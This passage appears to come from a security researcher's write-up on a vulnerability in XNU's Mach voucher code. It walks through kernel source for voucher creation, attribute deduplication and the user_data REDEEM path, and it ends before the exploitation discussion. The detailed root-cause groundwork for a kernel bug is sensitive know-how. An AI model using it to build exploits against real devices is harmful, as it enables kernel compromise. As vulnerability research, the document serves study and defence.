That definition is technically correct, though perhaps not all that helpful by itself.

To actually understand the root cause and exploitability of this vulnerability is going to require covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.

A voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.

For a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.

Here's the structure of a voucher:

struct ipc_voucher {

  iv_index_t     iv_hash;        /* checksum hash */

  iv_index_t     iv_sum;         /* checksum of values */

  os_refcnt_t    iv_refs;        /* reference count */

  iv_index_t     iv_table_size;  /* size of the voucher table */

  iv_index_t     iv_inline_table[IV_ENTRIES_INLINE];

  iv_entry_t     iv_table;       /* table of voucher attr entries */

  ipc_port_t     iv_port;        /* port representing the voucher */

  queue_chain_t  iv_hash_link;   /* link on hash chain */

};

 

#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN

The voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.

Keys

Keys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table table determines what "key" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:

#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)

#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)

 

/* other well-known-keys will be added here */

#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)

#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)

#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)

#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)

 

#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)

 

#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)

 

#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST

The iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding "types" of values which they manage. More on that later.

Values

Each entry in a voucher iv_table is an iv_index_t:

typedef natural_t iv_index_t;

Each value is again an index; this time into a per-key cache of values, abstracted as a "Voucher Attribute Cache Control Object" represented by this structure:

struct ipc_voucher_attr_control {

os_refcnt_t   ivac_refs;

boolean_t     ivac_is_growing;      /* is the table being grown */

ivac_entry_t  ivac_table;           /* table of voucher attr value entries */

iv_index_t    ivac_table_size;      /* size of the attr value table */

iv_index_t    ivac_init_table_size; /* size of the attr value table */

iv_index_t    ivac_freelist;        /* index of the first free element */

ipc_port_t    ivac_port;            /* port for accessing the cache control  */

lck_spin_t    ivac_lock_data;

iv_index_t    ivac_key_index;       /* key index for this value */

};

These are accessed indirectly via another global table:

static ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN];

(Again, the comments in the code indicate that in the future that this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed size array.)

Each element in that table has this structure:

typedef struct ipc_voucher_global_table_element {

        ipc_voucher_attr_manager_t      ivgte_manager;

        ipc_voucher_attr_control_t      ivgte_control;

        mach_voucher_attr_key_t         ivgte_key;

} ipc_voucher_global_table_element;

Both the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.

The ipc_voucher_attr_control_t provides an abstract interface for managing "values" and the ipc_voucher_attr_manager_t provides the "type-specific" logic to implement the semantics of each type (here by type I mean "key" or "attr" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:

struct ipc_voucher_attr_manager {

  ipc_voucher_attr_manager_release_value_t    ivam_release_value;

  ipc_voucher_attr_manager_get_value_t        ivam_get_value;

  ipc_voucher_attr_manager_extract_content_t  ivam_extract_content;

  ipc_voucher_attr_manager_command_t          ivam_command;

  ipc_voucher_attr_manager_release_t          ivam_release;

  ipc_voucher_attr_manager_flags              ivam_flags;

};

ivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:

const struct ipc_voucher_attr_manager user_data_manager = {

  .ivam_release_value =   user_data_release_value,

  .ivam_get_value =       user_data_get_value,

  .ivam_extract_content = user_data_extract_content,

  .ivam_command =         user_data_command,

  .ivam_release =         user_data_release,

  .ivam_flags =           IVAM_FLAGS_NONE,

};

Those five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!

Let's go back to the generic ipc_voucher_attr_control structure which maintains the "values" for each key in a type-agnostic way. The most important field is ivac_entry_t  ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.

Here's the structure of each entry in that table:

struct ivac_entry_s {

  iv_value_handle_t ivace_value;

  iv_value_refs_t   ivace_layered:1,   /* layered effective entry */

                    ivace_releasing:1, /* release in progress */

                    ivace_free:1,      /* on freelist */

                    ivace_persist:1,   /* Persist the entry, don't

                                           count made refs */

                    ivace_refs:28;     /* reference count */

  union {

    iv_value_refs_t ivaceu_made;       /* made count (non-layered) */

    iv_index_t      ivaceu_layer;      /* next effective layer

                                          (layered) */

  } ivace_u;

  iv_index_t        ivace_next;        /* hash or freelist */

  iv_index_t        ivace_index;       /* hash head (independent) */

};

ivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.

Table entries which aren't free store a type-specific "handle" in ivace_value. Here's the typedef chain for that type:

iv_value_handle_t ivace_value

typedef mach_voucher_attr_value_handle_t iv_value_handle_t;

typedef uint64_t mach_voucher_attr_value_handle_t;

The handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.

A guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)

Userdata attrs

user_data is one of the four types of supported, implemented voucher attr types. It's only purpose is to manage buffers of arbitrary, user controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer) the userdata attr manager is responsible for ensuring that userdata values which have identical buffer values (matching length and bytes) have identical pointers.

To do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:

struct user_data_value_element {

  mach_voucher_attr_value_reference_t e_made;

  mach_voucher_attr_content_size_t    e_size;

  iv_index_t                          e_sum;

  iv_index_t                          e_hash;

  queue_chain_t                       e_hash_link;

  uint8_t                             e_data[];

};

Each inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.

e_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivace_entry and a user_data_value_element this structure shouldn't need to be reference counted. There is however one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...

Recipes

The host_create_mach_voucher host port MIG (Mach Interface Generator) method is the userspace interface for creating vouchers:

kern_return_t

host_create_mach_voucher(mach_port_name_t host,

    mach_voucher_attr_raw_recipe_array_t recipes,

    mach_voucher_attr_recipe_size_t recipesCnt,

    mach_port_name_t *voucher);

recipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:

typedef struct mach_voucher_attr_recipe_data {

  mach_voucher_attr_key_t            key;

  mach_voucher_attr_recipe_command_t command;

  mach_voucher_name_t                previous_voucher;

  mach_voucher_attr_content_size_t   content_size;

  uint8_t                            content[];

} mach_voucher_attr_recipe_data_t;

key is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.

Here are the supported generic commands for voucher creation:

MACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.

MACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)

MACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.

MACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.

Here are the attr-specific commands for voucher creation for each type:

bank:

MACH_VOUCHER_ATTR_BANK_CREATE

MACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA

MACH_VOUCHER_ATTR_AUTO_REDEEM

MACH_VOUCHER_ATTR_SEND_PREPROCESS

importance:

MACH_VOUCHER_ATTR_IMPORTANCE_SELF

user_data:

MACH_VOUCHER_ATTR_USER_DATA_STORE

pthread_priority:

MACH_VOUCHER_ATTR_PTHPRIORITY_CREATE

Note that there are further commands which can be "executed against" vouchers via the mach_voucher_attr_command MIG method which calls the attr manager's        ivam_command function pointer. Those are:

bank:

BANK_ORIGINATOR_PID

BANK_PERSONA_TOKEN

BANK_PERSONA_ID

importance:

MACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL

user_data:

none

pthread_priority:

none

Let's look at example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

Let's follow the path of this recipe in detail.

Here's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.

/* allocate new voucher */

voucher = iv_alloc(ivgt_keys_in_use);

if (IV_NULL == voucher) {

  return KERN_RESOURCE_SHORTAGE;

}

 /* iterate over the recipe items */

while (0 < recipe_size - recipe_used) {

  ipc_voucher_t prev_iv;

  if (recipe_size - recipe_used < sizeof(*sub_recipe)) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  /* find the next recipe */

  sub_recipe =

    (mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];

  if (recipe_size - recipe_used - sizeof(*sub_recipe) <

      sub_recipe->content_size) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  recipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;

  /* convert voucher port name (current space) */

  /* into a voucher reference */

  prev_iv =

    convert_port_name_to_voucher(sub_recipe->previous_voucher);

  if (MACH_PORT_NULL != sub_recipe->previous_voucher &&

      IV_NULL == prev_iv) {

    kr = KERN_INVALID_CAPABILITY;

    break;

  }

  kr = ipc_execute_voucher_recipe_command(

         voucher,

         sub_recipe->key,

         sub_recipe->command,

         prev_iv,

         sub_recipe->content,

         sub_recipe->content_size,

         FALSE);

  ipc_voucher_release(prev_iv);

  if (KERN_SUCCESS != kr) {

    break;

  }

}

if (KERN_SUCCESS == kr) {

  *new_voucher = iv_dedup(voucher);

} else {

  *new_voucher = IV_NULL;

  iv_dealloc(voucher, FALSE);

}

At the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via the sub-recipe previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports so it's passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or "redeem" them. As discussed, the semantics of redeeming a voucher attr isn't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.

Once the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly created newly-created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.

Let's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.

static kern_return_t

ipc_execute_voucher_recipe_command(

  ipc_voucher_t                      voucher,

  mach_voucher_attr_key_t            key,

  mach_voucher_attr_recipe_command_t command,

  ipc_voucher_t                      prev_iv,

  mach_voucher_attr_content_t        content,

  mach_voucher_attr_content_size_t   content_size,

  boolean_t                          key_priv)

{

  iv_index_t prev_val_index;

  iv_index_t val_index;

  kern_return_t kr;

  switch (command) {

MACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code falls through to the default case:

        default:

                kr = ipc_replace_voucher_value(voucher,

                    key,

                    command,

                    prev_iv,

                    content,

                    content_size);

                if (KERN_SUCCESS != kr) {

                        return kr;

                }

                break;

        }

        return KERN_SUCCESS;

Here's that code:

static kern_return_t

ipc_replace_voucher_value(

        ipc_voucher_t                           voucher,

        mach_voucher_attr_key_t                 key,

        mach_voucher_attr_recipe_command_t      command,

        ipc_voucher_t                           prev_voucher,

        mach_voucher_attr_content_t             content,

        mach_voucher_attr_content_size_t        content_size)

{

...

        /*

         * Get the manager for this key_index.

         * Returns a reference on the control.

         */

        key_index = iv_key_to_index(key);

        ivgt_lookup(key_index, TRUE, &ivam, &ivac);

        if (IVAM_NULL == ivam) {

                return KERN_INVALID_ARGUMENT;

        }

..

iv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATRR_KEY_ALL):

static inline iv_index_t

iv_key_to_index(mach_voucher_attr_key_t key)

{

        if (MACH_VOUCHER_ATTR_KEY_ALL == key ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {

                return IV_UNUSED_KEYINDEX;

        }

        return (iv_index_t)key - 1;

}

ivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different "key types" actually mean; and the controller stores (and caches) values for those keys.

Let's keep reading ipc_replace_voucher_value. Here's the next statement:

        /* save the current value stored in the forming voucher */

        save_val_index = iv_lookup(voucher, key_index);

This point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There's allusions in the code to future functionality where attribute values can be "layered" or "linked" but for now such functionality doesn't exist.)

iv_lookup returns the "value index" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:

static inline iv_index_t

iv_lookup(ipc_voucher_t iv, iv_index_t key_index)

{

        if (key_index < iv->iv_table_size) {

                return iv->iv_table[key_index];

        }

        return IV_UNUSED_VALINDEX;

}

This value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.

        prev_val_index = (IV_NULL != prev_voucher) ?

            iv_lookup(prev_voucher, key_index) :

            save_val_index;

Then the code looks up the actual previous value to operate on:

        ivace_lookup_values(key_index, prev_val_index,

            previous_vals, &previous_vals_count);

key_index is the key we're operating on, MACH_VOUCHER_ATTR_KEY_USER_DATA in this example. This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.

Here's ivace_lookup_values:

static void

ivace_lookup_values(

        iv_index_t                              key_index,

        iv_index_t                              value_index,

        mach_voucher_attr_value_handle_array_t          values,

        mach_voucher_attr_value_handle_array_size_t     *count)

{

        ipc_voucher_attr_control_t ivac;

        ivac_entry_t ivace;

        if (IV_UNUSED_VALINDEX == value_index ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {

                *count = 0;

                return;

        }

        ivac = iv_global_table[key_index].ivgte_control;

        assert(IVAC_NULL != ivac);

        /*

         * Get the entry and then the linked values.

         */

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        /*

         * TODO: support chained values (for effective vouchers).

         */

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

}

The locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.

Let's discuss the ivace_lookup_values code. They index the iv_global_table to get a pointer to the attribute type's controller:

        ivac = iv_global_table[key_index].ivgte_control;

They take that controller's lock then index its ivac_table to find that value's struct ivac_entry_s and read the ivace_value value from there:

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

Let's go back to the calling function (ipc_replace_voucher_value) and keep reading:

        /* Call out to resource manager to get new value */

        new_value_voucher = IV_NULL;

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

ivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of "get_value". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like "store_value".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)

ivam_get_value for the user_data attribute type is user_data_get_value:

static kern_return_t

user_data_get_value(

        ipc_voucher_attr_manager_t                      __assert_only manager,

        mach_voucher_attr_key_t                         __assert_only key,

        mach_voucher_attr_recipe_command_t              command,

        mach_voucher_attr_value_handle_array_t          prev_values,

        mach_voucher_attr_value_handle_array_size_t     prev_value_count,

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size,

        mach_voucher_attr_value_handle_t                *out_value,

        mach_voucher_attr_value_flags_t                 *out_flags,

        ipc_voucher_t                                   *out_value_voucher)

{

        user_data_element_t elem;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        /* never an out voucher */

        *out_value_voucher = IPC_VOUCHER_NULL;

        *out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

        case MACH_VOUCHER_ATTR_USER_DATA_STORE:

                if (USER_DATA_MAX_DATA < content_size) {

                        return KERN_RESOURCE_SHORTAGE;

                }

                /* empty is the default */

                if (0 == content_size) {

                        *out_value = 0;

                        return KERN_SUCCESS;

                }

                elem = user_data_dedup(content, content_size);

                *out_value = (mach_voucher_attr_value_handle_t)elem;

                return KERN_SUCCESS;

        default:

                /* every other command is unknown */

                return KERN_INVALID_ARGUMENT;

        }

}

Let's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:

static user_data_element_t

user_data_dedup(

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size)

{

        iv_index_t sum;

        iv_index_t hash;

        user_data_element_t elem;

        user_data_element_t alloc = NULL;

        sum = user_data_checksum(content, content_size);

        hash = USER_DATA_HASH_BUCKET(sum);

retry:

        user_data_lock();

        queue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {

                assert(elem->e_hash == hash);

                /* if sums match... */

                if (elem->e_sum == sum && elem->e_size == content_size) {

                        iv_index_t i;

                        /* and all data matches */

                        for (i = 0; i < content_size; i++) {

                                if (elem->e_data[i] != content[i]) {

                                        break;

                                }

                        }

                        if (i < content_size) {

                                continue;

                        }

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

                        if (NULL != alloc) {

                                kfree(alloc, sizeof(*alloc) + content_size);

                        }

                        return elem;

                }

        }

        if (NULL == alloc) {

                user_data_unlock();

                alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);

                alloc->e_made = 1;

                alloc->e_size = content_size;

                alloc->e_sum = sum;

                alloc->e_hash = hash;

                memcpy(alloc->e_data, content, content_size);

                goto retry;

        }

        queue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);

        user_data_unlock();

        return alloc;

}

The user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:

struct user_data_value_element {

        mach_voucher_attr_value_reference_t     e_made;

        mach_voucher_attr_content_size_t        e_size;

        iv_index_t                              e_sum;

        iv_index_t                              e_hash;

        queue_chain_t                           e_hash_link;

        uint8_t                                 e_data[];

};

Pointers to those elements are stored in the user_data_bucket hash table.

user_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.

The e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.

If a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.

The first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well technically there's also nothing stopping it overflowing so it can also go down 1 in every 232 increments...)

Let's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:

The next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:

        /* TODO: value insertion from returned voucher */

        if (IV_NULL != new_value_voucher) {

                iv_release(new_value_voucher);

        }

Next, the code needs to wrap new_value in an ivace_entry and determine the index of that ivace_entry in the controller's table of values. This is done by ivace_reference_by_value:

        /*

         * Find or create a slot in the table associated

         * with this attribute value.  The ivac reference

         * is transferred to a new value, or consumed if

         * we find a matching existing value.

         */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

        iv_set(voucher, key_index, val_index);

/*

 * Look up the values for a given <key, index> pair.

 *

 * Consumes a reference on the passed voucher control.

 * Either it is donated to a newly-created value cache

 * or it is released (if we piggy back on an existing

 * value cache entry).

 */

static iv_index_t

ivace_reference_by_value(

        ipc_voucher_attr_control_t      ivac,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_flags_t          flag)

{

        ivac_entry_t ivace = IVACE_NULL;

        iv_index_t hash_index;

        iv_index_t index;

        if (IVAC_NULL == ivac) {

                return IV_UNUSED_VALINDEX;

        }

        ivac_lock(ivac);

restart:

        hash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);

        index = ivac->ivac_table[hash_index].ivace_index;

        while (index != IV_HASH_END) {

                assert(index < ivac->ivac_table_size);

                ivace = &ivac->ivac_table[index];

                assert(!ivace->ivace_free);

                if (ivace->ivace_value == value) {

                        break;

                }

                assert(ivace->ivace_next != index);

                index = ivace->ivace_next;

        }

        /* found it? */

        if (index != IV_HASH_END) {

                /* only add reference on non-persistent value */

                if (!ivace->ivace_persist) {

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

                }

                ivac_unlock(ivac);

                ivac_release(ivac);

                return index;

        }

        /* insert new entry in the table */

        index = ivac->ivac_freelist;

        if (IV_FREELIST_END == index) {

                /* freelist empty */

                ivac_grow_table(ivac);

                goto restart;

        }

        /* take the entry off the freelist */

        ivace = &ivac->ivac_table[index];

        ivac->ivac_freelist = ivace->ivace_next;

        /* initialize the new entry */

        ivace->ivace_value = value;

        ivace->ivace_refs = 1;

        ivace->ivace_made = 1;

        ivace->ivace_free = FALSE;

        ivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;

        /* insert the new entry in the proper hash chain */

        ivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;

        ivac->ivac_table[hash_index].ivace_index = index;

        ivac_unlock(ivac);

        /* donated passed in ivac reference to new entry */

        return index;

}

You'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.

If a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found then both its ivace_refs and ivace_made counts are incremented:

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

Finally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.

ivace_reference_by_value then calls iv_set to store that index into the correct slot in the voucher's iv_table, which is just a simple array index operation:

        iv_set(voucher, key_index, val_index);

static void

iv_set(ipc_voucher_t iv,

    iv_index_t key_index,

    iv_index_t value_index)

{

        assert(key_index < iv->iv_table_size);

        iv->iv_table[key_index] = value_index;

}

Our journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:

        if (KERN_SUCCESS == kr) {

                *new_voucher = iv_dedup(voucher);

I won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:

iv_dealloc(new_iv, FALSE);

The FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.

The final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.

(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)

Destruction

Although I did briefly hint at a vulnerability above we still haven't actually seen enough code to determine that that bug actually has any security consequences. This is where things get complicated ;-)

Let's start with the result of the situation we described above, where we created a voucher port with the following recipe:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

This will end up with the following data structures in the kernel:

voucher_port {

  ip_kobject = reference-counted pointer to the voucher

}

voucher {

  iv_refs = 1;

  iv_table[6] = reference-counted *index* into user_data controller's ivac_table

}

controller {

  ivace_table[index] =

    {

      ivace_refs = 1;

      ivace_made = 1;

      ivace_value = pointer to user_data_value_element

    }

}

user_data_value_element {

  e_made = 1;

  e_data[] = {0x41, 0x41, 0x41, 0x41}

}

Let's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.

